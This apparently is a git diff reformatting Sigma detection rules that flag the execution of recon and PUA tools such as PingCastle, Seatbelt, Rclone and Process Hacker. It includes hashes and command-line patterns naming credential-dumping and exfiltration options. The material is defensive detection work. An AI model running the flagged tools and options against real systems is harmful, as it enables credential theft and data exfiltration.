SHA1=04c39ffc18533100aaa4f9c06baf2c719ac94a61 - - SHA1=e082affa5cdb2d46452c6601a9e85acb8446b836 - - SHA1=a075bfb6cf5c6451ce682197a87277c8bc188719 - - SHA1=34c0c5839af1c92bce7562b91418443a2044c90d - - SHA1=74e10a9989e0ec8fe075537ac802bd3031ae7e08 - - SHA1=3a515551814775df0ccbe09f219bc972eae45a10 - - SHA256=90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b - - SHA256=5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85 - - SHA256=e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03 - - SHA256=9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795 - - SHA256=7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f - - SHA256=9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a - - SHA256=c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275 - - SHA256=1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b - - SHA256=768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2 - - SHA256=1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae - - SHA256=606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6 - - SHA256=b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a - - SHA256=ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1 - - SHA256=9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559 - - SHA256=c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2 - - SHA256=a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef - - SHA256=84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d - - SHA256=c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524 - - SHA256=01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b - - SHA256=9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b - - SHA256=63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629 - - SHA256=2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358 - - SHA256=7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca - - SHA256=e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea - - SHA256=dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172 - - SHA256=dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4 - - SHA256=8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2 - - SHA256=5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66 - - SHA256=e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27 - - SHA256=75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41 - - SHA256=56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1 - - SHA256=f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0 - - SHA256=845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8 - - SHA256=9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d - - SHA256=5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726 - - SHA256=37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90 - - SHA256=ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5 - - SHA256=3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140 - - SHA256=d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87 - - SHA256=63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892 - - SHA256=47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054 - - SHA256=7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd - - NewProcessName|endswith: \PingCastle.exe - - OriginalFileName: PingCastle.exe - - Product: Ping Castle - - CommandLine|contains: - - --scanner aclcheck - - --scanner antivirus - - --scanner computerversion - - --scanner foreignusers - - --scanner laps_bitlocker - - --scanner localadmin - - --scanner nullsession - - --scanner nullsession-trust - - --scanner oxidbindings - - --scanner remote - - --scanner share - - --scanner smb - - --scanner smb3querynetwork - - --scanner spooler - - --scanner startup - - --scanner zerologon - - CommandLine|contains: --no-enum-limit - - CommandLine|contains|all: - - --healthcheck - - --level Full - - CommandLine|contains|all: - - --healthcheck - - '--server ' + - Hashes|contains: + # PingCastle.exe + - MD5=f741f25ac909ee434e50812d436c73ff + - MD5=d40acbfc29ee24388262e3d8be16f622 + - MD5=01bb2c16fadb992fa66228cd02d45c60 + - MD5=9e1b18e62e42b5444fc55b51e640355b + - MD5=b7f8fe33ac471b074ca9e630ba0c7e79 + - MD5=324579d717c9b9b8e71d0269d13f811f + - MD5=63257a1ddaf83cfa43fe24a3bc06c207 + - MD5=049e85963826b059c9bac273bb9c82ab + - MD5=ecb98b7b4d4427eb8221381154ff4cb2 + - MD5=faf87749ac790ec3a10dd069d10f9d63 + - MD5=f296dba5d21ad18e6990b1992aea8f83 + - MD5=93ba94355e794b6c6f98204cf39f7a11 + - MD5=a258ef593ac63155523a461ecc73bdba + - MD5=97000eb5d1653f1140ee3f47186463c4 + - MD5=95eb317fbbe14a82bd9fdf31c48b8d93 + - MD5=32fe9f0d2630ac40ea29023920f20f49 + - MD5=a05930dde939cfd02677fc18bb2b7df5 + - MD5=124283924e86933ff9054a549d3a268b + - MD5=ceda6909b8573fdeb0351c6920225686 + - MD5=60ce120040f2cd311c810ae6f6bbc182 + - MD5=2f10cdc5b09100a260703a28eadd0ceb + - MD5=011d967028e797a4c16d547f7ba1463f + - MD5=2da9152c0970500c697c1c9b4a9e0360 + - MD5=b5ba72034b8f44d431f55275bace9f8b + - MD5=d6ed9101df0f24e27ff92ddab42dacca + - MD5=3ed3cdb6d12aa1ac562ad185cdbf2d1d + - MD5=5e083cd0143ae95a6cb79b68c07ca573 + - MD5=28caff93748cb84be70486e79f04c2df + - MD5=9d4f12c30f9b500f896efd1800e4dd11 + - MD5=4586f7dd14271ad65a5fb696b393f4c0 + - MD5=86ba9dddbdf49215145b5bcd081d4011 + - MD5=9dce0a481343874ef9a36c9a825ef991 + - MD5=85890f62e231ad964b1fda7a674747ec + - MD5=599be548da6441d7fe3e9a1bb8cb0833 + - MD5=9b0c7fd5763f66e9b8c7b457fce53f96 + - MD5=32d45718164205aec3e98e0223717d1d + - MD5=6ff5f373ee7f794cd17db50704d00ddb + - MD5=88efbdf41f0650f8f58a3053b0ca0459 + - MD5=ef915f61f861d1fb7cbde9afd2e7bd93 + - MD5=781fa16511a595757154b4304d2dd350 + - MD5=5018ec39be0e296f4fc8c8575bfa8486 + - MD5=f4a84d6f1caf0875b50135423d04139f + - SHA1=9c1431801fa6342ed68f047842b9a11778fc669b + - SHA1=c36c862f40dad78cb065197aad15fef690c262f2 + - SHA1=bc8e23faea8b3c537f268b3e81d05b937012272d + - SHA1=12e0357658614ff60d480d1a6709be68a2e40c5f + - SHA1=18b33ab5719966393d424a3edbfa8dec225d98fa + - SHA1=f14c9633040897d375e3069fddc71e859f283778 + - SHA1=08041b426c9f112ad2061bf3c8c718e34739d4fc + - SHA1=7be77c885d0c9a4af4cecc64d512987cf93ba937 + - SHA1=72dbb719b05f89d9d2dbdf186714caf7639daa36 + - SHA1=5b1498beb2cfb4d971e377801e7abce62c0e315b + - SHA1=292629c6ab33bddf123d26328025e2d157d9e8fc + - SHA1=be59e621e83a2d4c87b0e6c69a2d22f175408b11 + - SHA1=0250ce9a716ab8cca1c70a9de4cbc49a51934995 + - SHA1=607e1fa810c799735221a609af3bfc405728c02d + - SHA1=ab1c547f6d1c07a9e0a01e46adea3aae1cac12e3 + - SHA1=044cf5698a8e6b0aeba5acb56567f06366a9a70a + - SHA1=ef2dea8c736d49607832986c6c2d6fdd68ba6491 + - SHA1=efffc2bfb8af2e3242233db9a7109b903fc3f178 + - SHA1=5a05d4320de9afbc84de8469dd02b3a109efb2d4 + - SHA1=a785d88cf8b862a420b9be793ee6a9616aa94c84 + - SHA1=5688d56cbaf0d934c4e37b112ba257e8fb63f4ea + - SHA1=5cd2ada1c26815fbfd6a0cd746d5d429c0d83a17 + - SHA1=81d67b3d70c4e855cb11a453cc32997517708362 + - SHA1=9cffce9de95e0109f4dfecce0ab2cb0a59cc58ad + - SHA1=09c6930d057f49c1c1e11cf9241fffc8c12df3a2 + - SHA1=e27bf7db8d96db9d4c8a06ee5e9b8e9fcb86ac92 + - SHA1=9e3c992415e390f9ada4d15c693b687f38a492d1 + - SHA1=3f34a5ee303d37916584c888c4928e1c1164f92a + - SHA1=ea4c8c56a8f5c90a4c08366933e5fb2de611d0db + - SHA1=3150f14508ee4cae19cf09083499d1cda8426540 + - SHA1=036ad9876fa552b1298c040e233d620ea44689c6 + - SHA1=3a3c1dcb146bb4616904157344ce1a82cd173bf5 + - SHA1=6230d6fca973fa26188dfbadede57afb4c15f75c + - SHA1=8f7b2a9b8842f339b1e33602b7f926ab65de1a4d + - SHA1=a586bb06b59a4736a47abff8423a54fe8e2c05c4 + - SHA1=c82152cddf9e5df49094686531872ecd545976db + - SHA1=04c39ffc18533100aaa4f9c06baf2c719ac94a61 + - SHA1=e082affa5cdb2d46452c6601a9e85acb8446b836 + - SHA1=a075bfb6cf5c6451ce682197a87277c8bc188719 + - SHA1=34c0c5839af1c92bce7562b91418443a2044c90d + - SHA1=74e10a9989e0ec8fe075537ac802bd3031ae7e08 + - SHA1=3a515551814775df0ccbe09f219bc972eae45a10 + - SHA256=90fd5b855b5107e7abaaefb6e658f50d5d6e08ac28e35f31d8b03dcabf77872b + - SHA256=5836c24f233f77342fee825f3cad73caab7ab4fb65ec2aec309fd12bc1317e85 + - SHA256=e850e54b12331249c357a20604281b9abf8a91e6f3d957463fc625e6b126ef03 + - SHA256=9e752f29edcd0db9931c20b173eee8d4d8196f87382c68a6e7eb4c8a44d58795 + - SHA256=7a8c127d6c41f80d178d2315ed2f751ac91b1cd54d008af13680e04f068f426f + - SHA256=9f65e1c142c4f814e056a197a2241fd09e09acf245c62897109871137321a72a + - SHA256=c9b52d03c66d54d6391c643b3559184b1425c84a372081ec2bfed07ebf6af275 + - SHA256=1b96f6218498aa6baf6f6c15b8f99e542077e33feb1ab5472bbbf7d4de43eb6b + - SHA256=768021fc242054decc280675750dec0a9e74e764b8646864c58756fa2386d2a2 + - SHA256=1e1b32bef31be040f0f038fcb5a2d68fb192daaef23c6167f91793d21e06ebae + - SHA256=606bd75ed9d2d6107ea7ee67063d1761a99f2fb5e932c8344d11395d24587dd6 + - SHA256=b489d3cdd158f040322ae5c8d0139ad28eff743c738a10f2d0255c7e149bd92a + - SHA256=ca7ecf04a8ad63aff330492c15270d56760cb223a607cdb1431fb00e1b9985d1 + - SHA256=9dc4fca72463078b70f6516559a179c78400b06534e63ee12fb38adbe2632559 + - SHA256=c00d2aee59bac087d769e09b5b7f832176f7714fefdc6af2502e6031e3eb37c2 + - SHA256=a8e96d564687064190eaf865774f773def05fdbf651aa5bbf66216c077b863ef + - SHA256=84ed328cee2a0505e87662faf6fc57915e3a831c97ee88ad691f5c63522e139d + - SHA256=c143de99c57965d3a44c1fce6a97c2773b050609c1ea7f45688a4ca2422a5524 + - SHA256=01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b + - SHA256=9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b + - SHA256=63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629 + - SHA256=2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358 + - SHA256=7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca + - SHA256=e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea + - SHA256=dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172 + - SHA256=dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4 + - SHA256=8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2 + - SHA256=5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66 + - SHA256=e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27 + - SHA256=75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41 + - SHA256=56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1 + - SHA256=f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0 + - SHA256=845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8 + - SHA256=9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d + - SHA256=5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726 + - SHA256=37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90 + - SHA256=ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5 + - SHA256=3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140 + - SHA256=d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87 + - SHA256=63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892 + - SHA256=47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054 + - SHA256=7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd + - NewProcessName|endswith: \PingCastle.exe + - OriginalFileName: PingCastle.exe + - Product: Ping Castle + - CommandLine|contains: + - --scanner aclcheck + - --scanner antivirus + - --scanner computerversion + - --scanner foreignusers + - --scanner laps_bitlocker + - --scanner localadmin + - --scanner nullsession + - --scanner nullsession-trust + - --scanner oxidbindings + - --scanner remote + - --scanner share + - --scanner smb + - --scanner smb3querynetwork + - --scanner spooler + - --scanner startup + - --scanner zerologon + - CommandLine|contains: --no-enum-limit + - CommandLine|contains|all: + - --healthcheck + - --level Full + - CommandLine|contains|all: + - --healthcheck + - '--server ' condition: process_creation and selection falsepositives: - Unknown +# Note: As this is a PUA the level may vary depending on your environment. Reduce or increase the level as you see fit level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml b/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml index 47a02d561..953010b04 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml @@ -1,14 +1,11 @@ title: PUA - PingCastle Execution From Potentially Suspicious Parent id: b37998de-a70b-4f33-b219-ec36bf433dc0 related: - - id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c - type: derived + - id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c + type: derived status: experimental -description: 'Detects the execution of PingCastle, a tool designed to quickly assess - the Active Directory security level via a script located in a potentially suspicious - or uncommon location. - - ' +description: | + Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location. references: - https://github.com/vletoux/pingcastle - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ @@ -53,45 +50,44 @@ detection: - \AppData\Roaming\ - \Temporary Internet selection_parent_path_2: - - ParentCommandLine|contains|all: - - :\Users\ - - \Favorites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Favourites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Contacts\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Favorites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Favourites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Contacts\ selection_cli: - - NewProcessName|endswith: \PingCastle.exe - - OriginalFileName: PingCastle.exe - - Product: Ping Castle - - CommandLine|contains: - - --scanner aclcheck - - --scanner antivirus - - --scanner computerversion - - --scanner foreignusers - - --scanner laps_bitlocker - - --scanner localadmin - - --scanner nullsession - - --scanner nullsession-trust - - --scanner oxidbindings - - --scanner remote - - --scanner share - - --scanner smb - - --scanner smb3querynetwork - - --scanner spooler - - --scanner startup - - --scanner zerologon - - CommandLine|contains: --no-enum-limit - - CommandLine|contains|all: - - --healthcheck - - --level Full - - CommandLine|contains|all: - - --healthcheck - - '--server ' - condition: process_creation and (1 of selection_parent_* and selection_parent_ext - and selection_cli) + - NewProcessName|endswith: \PingCastle.exe + - OriginalFileName: PingCastle.exe + - Product: Ping Castle + - CommandLine|contains: + - --scanner aclcheck + - --scanner antivirus + - --scanner computerversion + - --scanner foreignusers + - --scanner laps_bitlocker + - --scanner localadmin + - --scanner nullsession + - --scanner nullsession-trust + - --scanner oxidbindings + - --scanner remote + - --scanner share + - --scanner smb + - --scanner smb3querynetwork + - --scanner spooler + - --scanner startup + - --scanner zerologon + - CommandLine|contains: --no-enum-limit + - CommandLine|contains|all: + - --healthcheck + - --level Full + - CommandLine|contains|all: + - --healthcheck + - '--server ' + condition: process_creation and (1 of selection_parent_* and selection_parent_ext and selection_cli) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_process_hacker.yml b/sigma/builtin/process_creation/proc_creation_win_pua_process_hacker.yml index 8c6455b88..cfb7be40a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_process_hacker.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_process_hacker.yml @@ -1,18 +1,13 @@ title: PUA - Process Hacker Execution id: 811e0002-b13b-4a15-9d00-a613fce66e42 related: - - id: 5722dff1-4bdd-4949-86ab-fbaf707e767a - type: similar + - id: 5722dff1-4bdd-4949-86ab-fbaf707e767a + type: similar status: experimental -description: 'Detects the execution of Process Hacker based on binary metadata information - (Image, Hash, Imphash, etc). - - Process Hacker is a tool to view and manipulate processes, kernel options and - other low level options. - +description: | + Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). + Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes. - - ' references: - https://processhacker.sourceforge.io/ - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/ @@ -35,13 +30,13 @@ detection: EventID: 4688 Channel: Security selection_image: - - NewProcessName|contains: \ProcessHacker_ - - NewProcessName|endswith: \ProcessHacker.exe - - OriginalFileName: - - ProcessHacker.exe - - Process Hacker - - Description: Process Hacker - - Product: Process Hacker + - NewProcessName|contains: \ProcessHacker_ + - NewProcessName|endswith: \ProcessHacker.exe + - OriginalFileName: + - ProcessHacker.exe + - Process Hacker + - Description: Process Hacker + - Product: Process Hacker selection_hashes: Hashes|contains: - MD5=68F9B52895F4D34E74112F3129B3B00D @@ -53,21 +48,20 @@ detection: - IMPHASH=3695333C60DEDECDCAFF1590409AA462 - IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF selection_hash_values: - - md5: - - 68f9b52895f4d34e74112f3129b3b00d - - b365af317ae730a67c936f21432b9c71 - - sha1: - - c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e - - a0bdfac3ce1880b32ff9b696458327ce352e3b1d - - sha256: - - d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f - - bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4 - - Imphash: - - 04de0ad9c37eb7bd52043d2ecac958df - - 3695333c60dedecdcaff1590409aa462 + - md5: + - 68f9b52895f4d34e74112f3129b3b00d + - b365af317ae730a67c936f21432b9c71 + - sha1: + - c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e + - a0bdfac3ce1880b32ff9b696458327ce352e3b1d + - sha256: + - d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f + - bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4 + - Imphash: + - 04de0ad9c37eb7bd52043d2ecac958df + - 3695333c60dedecdcaff1590409aa462 condition: process_creation and (1 of selection_*) falsepositives: - - While sometimes 'Process Hacker is used by legitimate administrators, the execution - of Process Hacker must be investigated and allowed on a case by case basis + - While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_rcedit_execution.yml b/sigma/builtin/process_creation/proc_creation_win_pua_rcedit_execution.yml index dbaf6b02e..0af312a60 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_rcedit_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_rcedit_execution.yml @@ -1,9 +1,7 @@ title: PUA - Potential PE Metadata Tamper Using Rcedit id: 0c92f2e6-f08f-4b73-9216-ecb0ca634689 status: test -description: Detects the use of rcedit to potentially alter executable PE metadata - properties, which could conceal efforts to rename system utilities for defense - evasion. +description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion. references: - https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe - https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915 @@ -25,15 +23,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \rcedit-x64.exe - - \rcedit-x86.exe - - Description: Edit resources of exe - - Product: rcedit + - NewProcessName|endswith: + - \rcedit-x64.exe + - \rcedit-x86.exe + - Description: Edit resources of exe + - Product: rcedit selection_flags: - CommandLine|contains: --set- + CommandLine|contains: --set- # Covers multiple edit commands such as "--set-resource-string" or "--set-version-string" selection_attributes: - CommandLine|contains: + CommandLine|contains: - OriginalFileName - CompanyName - FileDescription @@ -42,7 +40,6 @@ detection: - LegalCopyright condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use of the tool by administrators or users to update metadata of - a binary + - Legitimate use of the tool by administrators or users to update metadata of a binary level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_rclone_execution.yml b/sigma/builtin/process_creation/proc_creation_win_pua_rclone_execution.yml index e15da8d6e..af2297859 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_rclone_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_rclone_execution.yml @@ -1,13 +1,12 @@ title: PUA - Rclone Execution id: e37db05d-d1f9-49c8-b464-cee1a4b11638 related: - - id: a0d63692-a531-4912-ad39-4393325b2a9c - type: obsoletes - - id: cb7286ba-f207-44ab-b9e6-760d82b84253 - type: obsoletes + - id: a0d63692-a531-4912-ad39-4393325b2a9c + type: obsoletes + - id: cb7286ba-f207-44ab-b9e6-760d82b84253 + type: obsoletes status: test -description: Detects execution of RClone utility for exfiltration as used by various - ransomwares strains like REvil, Conti, FiveHands, etc +description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc references: - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware @@ -28,15 +27,15 @@ detection: EventID: 4688 Channel: Security selection_specific_options: - CommandLine|contains|all: + CommandLine|contains|all: - '--config ' - '--no-check-certificate ' - ' copy ' selection_rclone_img: - - NewProcessName|endswith: \rclone.exe - - Description: Rsync for cloud storage + - NewProcessName|endswith: \rclone.exe + - Description: Rsync for cloud storage selection_rclone_cli: - CommandLine|contains: + CommandLine|contains: - pass - user - copy diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_runxcmd.yml b/sigma/builtin/process_creation/proc_creation_win_pua_runxcmd.yml index 362d4e853..6bfe18226 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_runxcmd.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_runxcmd.yml @@ -1,8 +1,7 @@ title: PUA - RunXCmd Execution id: 93199800-b52a-4dec-b762-75212c196542 status: test -description: Detects the use of the RunXCmd tool to execute commands with System or - TrustedInstaller accounts +description: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts references: - https://www.d7xtech.com/free-software/runx/ - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/ @@ -21,11 +20,11 @@ detection: EventID: 4688 Channel: Security selection_account: - CommandLine|contains: + CommandLine|contains: - ' /account=system ' - ' /account=ti ' selection_exec: - CommandLine|contains: /exec= + CommandLine|contains: /exec= condition: process_creation and (all of selection_*) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_seatbelt.yml b/sigma/builtin/process_creation/proc_creation_win_pua_seatbelt.yml index c825383d6..d61480cf5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_seatbelt.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_seatbelt.yml @@ -1,8 +1,7 @@ title: PUA - Seatbelt Execution id: 38646daa-e78f-4ace-9de0-55547b2d30da status: test -description: Detects the execution of the PUA/Recon tool Seatbelt via PE information - of command line parameters +description: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters references: - https://github.com/GhostPack/Seatbelt - https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html @@ -22,24 +21,29 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \Seatbelt.exe - - OriginalFileName: Seatbelt.exe - - Description: Seatbelt - - CommandLine|contains: - - ' DpapiMasterKeys' - - ' InterestingProcesses' - - ' InterestingFiles' - - ' CertificateThumbprints' - - ' ChromiumBookmarks' - - ' ChromiumHistory' - - ' ChromiumPresence' - - ' CloudCredentials' - - ' CredEnum' - - ' CredGuard' - - ' FirefoxHistory' - - ' ProcessCreationEvents' + - NewProcessName|endswith: \Seatbelt.exe + - OriginalFileName: Seatbelt.exe + - Description: Seatbelt + - CommandLine|contains: + # This just a list of the commands that will produce the least amount of FP in "theory" + # Comment out/in as needed in your environment + # To get the full list of commands see reference section + - ' DpapiMasterKeys' + - ' InterestingProcesses' + - ' InterestingFiles' + - ' CertificateThumbprints' + - ' ChromiumBookmarks' + - ' ChromiumHistory' + - ' ChromiumPresence' + - ' CloudCredentials' + - ' CredEnum' + - ' CredGuard' + - ' FirefoxHistory' + - ' ProcessCreationEvents' + # - ' RDPSessions' + # - ' PowerShellHistory' selection_group_list: - CommandLine|contains: + CommandLine|contains: - ' -group=misc' - ' -group=remote' - ' -group=chromium' @@ -48,7 +52,7 @@ detection: - ' -group=user' - ' -group=all' selection_group_output: - CommandLine|contains: ' -outputfile=' + CommandLine|contains: ' -outputfile=' condition: process_creation and (selection_img or all of selection_group_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_pua_system_informer.yml b/sigma/builtin/process_creation/proc_creation_win_pua_system_informer.yml index e4724f4bc..2542f9632 100644 --- a/sigma/builtin/process_creation/proc_creation_win_pua_system_informer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_pua_system_informer.yml @@ -1,11 +1,10 @@ title: PUA - System Informer Execution id: 5722dff1-4bdd-4949-86ab-fbaf707e767a related: - - id: 811e0002-b13b-4a15-9d00-a613fce66e42 - type: similar + - id: 811e0002-b13b-4a15-9d00-a613fce66e42 + type: similar status: experimental -description: Detects the execution of System Informer, a task manager tool to view - and manipulate processes, kernel options and other low level operations +description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations references: - https://github.com/winsiderss/systeminformer author: Florian Roth (Nextron Systems) @@ -26,24 +25,25 @@ detection: EventID: 4688 Channel: Security selection_image: - - NewProcessName|endswith: \SystemInformer.exe - - OriginalFileName: SystemInformer.exe - - Description: System Informer - - Product: System Informer + - NewProcessName|endswith: \SystemInformer.exe + - OriginalFileName: SystemInformer.exe + - Description: System Informer + - Product: System Informer selection_hashes: Hashes|contains: + # Note: add other hashes as needed + # 3.0.11077.6550 - MD5=19426363A37C03C3ED6FEDF57B6696EC - SHA1=8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC - SHA256=8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287 - IMPHASH=B68908ADAEB5D662F87F2528AF318F12 selection_hash_values: - - md5: 19426363A37C03C3ED6FEDF57B6696EC - - sha1: 8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC - - sha256: 8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287 - - Imphash: B68908ADAEB5D662F87F2528AF318F12 + - md5: 19426363A37C03C3ED6FEDF57B6696EC + - sha1: 8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC + - sha256: 8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287 + - Imphash: B68908ADAEB5D662F87F2528AF318F12 condition: process_creation and (1 of selection_*) falsepositives: - - System Informer is regularly used legitimately by system administrators or developers. - Apply additional filters accordingly + - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly level: medium ruletype: Sigma diff --git 